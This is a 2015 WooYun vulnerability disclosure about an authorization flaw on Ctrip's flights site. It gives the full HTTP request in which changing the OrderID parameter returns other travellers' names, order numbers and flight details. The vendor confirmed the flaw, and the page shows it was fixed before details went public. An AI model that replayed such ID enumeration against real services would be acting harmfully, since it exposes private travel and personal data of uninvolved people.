当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099914

漏洞标题:携程某处越权导致任意用户航班信息遍历(姓名、订单号、航班等)

相关厂商:携程旅行网

漏洞作者: 路人甲

提交时间:2015-03-06 18:24

修复时间:2015-04-25 18:38

公开时间:2015-04-25 18:38

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-06: 该漏洞正等待厂商内部评估
2015-03-06: 厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2015-03-26: 细节向核心白帽子及相关领域专家公开
2015-04-05: 细节向普通白帽子公开
2015-04-15: 细节向实习白帽子公开
2015-04-25: 细节向公众公开

简要描述:

携程某处越权导致任意用户航班信息遍历(姓名、订单号、航班等)
随便遍历了一下 结果被航班信息DDOS了 (´Д`)

详细说明:

E8C2C860-D5DD-4DA4-89DD-7051CEDBE604.png


此处抓包 遍历OrderID 可获取他人航班信息

POST /Domestic/OrderMask/GetJsonConfirmInfo?OrderID=1240414667 HTTP/1.1
Host: flights.ctrip.com
Proxy-Connection: keep-alive
Content-Length: 126
Cache-Control: max-age=0
Origin: http://flights.ctrip.com
If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
DNT: 1
Referer: http://flights.ctrip.com/domestic/OrderMask/ConfirmInformation?OrderID=1240414686&RepeatAction=FlightDomestic_Repeat_Confirm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
reciever=邮箱&PostMobilePhone=接收的手机号&EmailAddr=&OrderConfirmMailValue=&ReturnEmailAddr=&ResendMailValue=


漏洞证明:

WP(J@MB4RKJB@U7C2YLC[5V.jpg


MC6NYASS{79B[1VY[~_D{1C.jpg


@X~M){MO8ZR2IMZ8LT48Q]6.jpg


89W9HNTW56XH{0B$HFG@MNY.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-06 18:37

厂商回复:

漏洞已确认真实存在,并已安排人处理。
十分感谢。

最新状态:

暂无